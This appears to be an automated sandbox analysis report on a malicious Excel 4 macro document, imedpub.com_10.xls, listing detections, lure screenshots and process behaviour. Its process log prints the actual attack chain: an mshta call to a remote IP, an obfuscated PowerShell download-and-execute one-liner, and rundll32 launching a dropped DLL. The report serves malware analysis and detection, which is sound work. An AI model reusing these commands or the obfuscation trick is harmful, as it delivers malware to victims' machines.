Source: Yara match	File source: 0000000F.00000002.673602256.0000000003660000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673105429.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538257691.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673360837.0000000002F21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673205255.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538139872.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494009099.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673030786.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672529691.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672081662.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673507519.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494267369.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672772312.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538439653.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673316318.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673391096.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538498842.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673131902.0000000002D51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672329422.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.447160166.0000000000760000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493959169.0000000002341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672931992.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494193723.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538417405.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494121481.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.541212880.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494079905.00000000024F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Documents\ssd.dll, type: DROPPED

Source: imedpub.com_10.xls	Macro extractor: Sheet: Macro1 contains: mshta
Source: imedpub.com_10.xls	Macro extractor: Sheet: Macro1 contains: mshta

Source: imedpub.com_10.xls, type: SAMPLE	Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED	Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 Previewing is not available for protected documents. 15 16
Source: Screenshot number: 4	Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 24 25 26 27 28 2
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 , . Previewing is not available for protected documents. 15
Source: Screenshot number: 8	Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G) I I 24 25 26 27

Source: imedpub.com_10.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: imedpub.com_10.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....

Source: imedpub.com_10.xls	Initial sample: EXEC
Source: imedpub.com_10.xls	Initial sample: EXEC

Source: imedpub.com_10.xls	Macro extractor: Sheet name: Macro1
Source: imedpub.com_10.xls	Macro extractor: Sheet name: Macro1

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: imedpub.com_10.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: imedpub.com_10.xls, type: SAMPLE	Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED	Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100359C1 appears 46 times

Windows Analysis Report imedpub.com_10.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
imedpub.com_10.xls

Source: imedpub.com_10.xls	OLE indicator, VBA macros: true
Source: imedpub.com_10.xls.0.dr	OLE indicator, VBA macros: true

Source: imedpub.com_10.xls	OLE indicator, Workbook stream: true
Source: imedpub.com_10.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......X.[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.w......................lk....................................}..v............0.................".............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................lk..... ..............................}..v............0...............X.[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.w......................lk....................................}..v............0.................".............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................lk....8.[.............................}..v....P.......0.................[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".............y=.w....#.................lk....................................}..v....h.......0.................".............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................lk......[.............................}..v............0...............h.[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............Q.lk....E...............................}..v.....h......0...............8.[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............Q.lk....E...............................}..v....0.......0...............8.[.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............8.......:.......................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Code function: 4_3_02E600C0 push 8B4902A7h; iretd	4_3_02E600C6
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_02E608C9 push 8B4902A7h; iretd	4_3_02E608CE
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_02E600C0 push 8B4902A7h; iretd	4_3_02E600C6
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_02E608C9 push 8B4902A7h; iretd	4_3_02E608CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10032B7D push ecx; ret	9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030DFF push ecx; ret	9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10032B7D push ecx; ret	11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030DFF push ecx; ret	11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_003F0C04 push ss; ret	12_2_003F0E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_003F0F14 push FFFFFFF8h; retf	12_2_003F0F23

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\ssd.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy)			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100134F0 IsIconic,	9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	9_2_10018C9A
